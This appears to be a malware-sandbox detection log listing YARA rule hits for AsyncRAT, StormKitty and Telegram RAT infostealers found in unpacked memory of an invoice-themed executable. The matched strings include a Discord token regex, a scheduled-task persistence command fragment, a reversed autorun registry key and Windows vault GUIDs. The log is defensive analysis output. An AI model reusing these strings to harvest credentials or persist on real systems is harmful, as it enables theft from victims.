7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x10183:$sk01: LimerBoy/StormKitty 0x269ce:$sk01: LimerBoy/StormKitty 0x1ba79:$str01: set_sUsername 0x1bbff:$str02: set_sIsSecure 0x1bcdd:$str03: set_sExpMonth 0x1a12c:$str04: WritePasswords 0x1abcb:$str05: WriteCookies 0x1be8d:$str06: sChromiumPswPaths 0x1be9f:$str07: sGeckoBrowserPaths 0x22ca1:$str08: Username: {1} 0x23e49:$str08: Username: {1} 0x22cbd:$str09: Password: {2} 0x23e65:$str09: Password: {2} 0x24f7f:$str10: encrypted_key":"(.*?)"
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1d6c9:$str01: get_ActivatePong 0x1d5ee:$str02: get_SslClient 0x1d5d2:$str03: get_TcpClient 0x1d690:$str04: get_SendSync 0x1d670:$str05: get_IsConnected 0x1c131:$str06: set_UseShellExecute 0x27478:$str07: Pastebin 0x2146b:$str08: Select * from AntivirusProduct 0x27352:$str10: timeout 3 > NUL 0x27250:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x272e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x272e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x23863:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2593f:$s1: \VPN\NordVPN 0x25925:$s2: \VPN\OpenVPN 0x25907:$s3: \VPN\ProtonVPN
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x2409b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2410d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24197:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24229:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24293:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24305:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2439b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2442b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1018c:$x3: StormKitty 0x198ca:$s1: GetBSSID 0x197ca:$s2: GetAntivirus 0x24d4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x24f7d:$s6: "encrypted_key":"(.*?)"
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x10183:$sk01: LimerBoy/StormKitty 0x269ce:$sk01: LimerBoy/StormKitty 0x1ba79:$str01: set_sUsername 0x1bbff:$str02: set_sIsSecure 0x1bcdd:$str03: set_sExpMonth 0x1a12c:$str04: WritePasswords 0x1abcb:$str05: WriteCookies 0x1be8d:$str06: sChromiumPswPaths 0x1be9f:$str07: sGeckoBrowserPaths 0x22ca1:$str08: Username: {1} 0x23e49:$str08: Username: {1} 0x22cbd:$str09: Password: {2} 0x23e65:$str09: Password: {2} 0x24f7f:$str10: encrypted_key":"(.*?)"
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1d6c9:$str01: get_ActivatePong 0x1d5ee:$str02: get_SslClient 0x1d5d2:$str03: get_TcpClient 0x1d690:$str04: get_SendSync 0x1d670:$str05: get_IsConnected 0x1c131:$str06: set_UseShellExecute 0x27478:$str07: Pastebin 0x2146b:$str08: Select * from AntivirusProduct 0x27352:$str10: timeout 3 > NUL 0x27250:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x272e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x272e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x23863:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2593f:$s1: \VPN\NordVPN 0x25925:$s2: \VPN\OpenVPN 0x25907:$s3: \VPN\ProtonVPN
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x2409b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2410d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24197:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24229:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24293:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24305:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2439b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2442b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1018c:$x3: StormKitty 0x198ca:$s1: GetBSSID 0x197ca:$s2: GetAntivirus 0x24d4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x24f7d:$s6: "encrypted_key":"(.*?)"
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x10183:$sk01: LimerBoy/StormKitty 0x269ce:$sk01: LimerBoy/StormKitty 0x1ba79:$str01: set_sUsername 0x1bbff:$str02: set_sIsSecure 0x1bcdd:$str03: set_sExpMonth 0x1a12c:$str04: WritePasswords 0x1abcb:$str05: WriteCookies 0x1be8d:$str06: sChromiumPswPaths 0x1be9f:$str07: sGeckoBrowserPaths 0x22ca1:$str08: Username: {1} 0x23e49:$str08: Username: {1} 0x22cbd:$str09: Password: {2} 0x23e65:$str09: Password: {2} 0x24f7f:$str10: encrypted_key":"(.*?)"
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1d6c9:$str01: get_ActivatePong 0x1d5ee:$str02: get_SslClient 0x1d5d2:$str03: get_TcpClient 0x1d690:$str04: get_SendSync 0x1d670:$str05: get_IsConnected 0x1c131:$str06: set_UseShellExecute 0x27478:$str07: Pastebin 0x2146b:$str08: Select * from AntivirusProduct 0x27352:$str10: timeout 3 > NUL 0x27250:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x272e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x272e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x23863:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2593f:$s1: \VPN\NordVPN 0x25925:$s2: \VPN\OpenVPN 0x25907:$s3: \VPN\ProtonVPN
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x2409b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2410d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24197:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24229:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24293:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24305:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2439b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2442b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1018c:$x3: StormKitty 0x198ca:$s1: GetBSSID 0x197ca:$s2: GetAntivirus 0x24d4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x24f7d:$s6: "encrypted_key":"(.*?)"
11.2.SFHAWxtoIpgL.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.SFHAWxtoIpgL.exe.400000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
11.2.SFHAWxtoIpgL.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.SFHAWxtoIpgL.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.SFHAWxtoIpgL.exe.400000.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x287ce:$sk01: LimerBoy/StormKitty 0x1c9cb:$str05: WriteCookies 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
11.2.SFHAWxtoIpgL.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
11.2.SFHAWxtoIpgL.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
11.2.SFHAWxtoIpgL.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
11.2.SFHAWxtoIpgL.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x3d9a3:$sk01: LimerBoy/StormKitty 0x541ee:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x49299:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x4941f:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x494fd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x4794c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x483eb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x496ad:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x496bf:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x504c1:$str08: Username: {1}
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x4aee9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x4ae0e:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x4adf2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x4aeb0:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x4ae90:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x49951:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x54c98:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x4ec8b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x54b72:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x54a70:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x54b02:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x51083:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x5315f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x53145:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN 0x53127:$s3: \VPN\ProtonVPN
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x518bb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x5192d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x519b7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x51a49:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x51ab3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x51b25:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x51bbb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x51c4b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x3d9ac:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x470ea:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x46fea:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x5256b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.?)" 0x5279d:$s6: "encrypted_key":"(.?)"
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x3dba3:$sk01: LimerBoy/StormKitty 0x543ee:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x49499:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x4961f:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x496fd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x47b4c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x485eb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x498ad:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x498bf:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x506c1:$str08: Username: {1}
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x4b0e9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x4b00e:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x4aff2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x4b0b0:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x4b090:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x49b51:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x54e98:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x4ee8b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x54d72:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x54c70:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x54d02:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x51283:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x5335f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x53345:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN 0x53327:$s3: \VPN\ProtonVPN
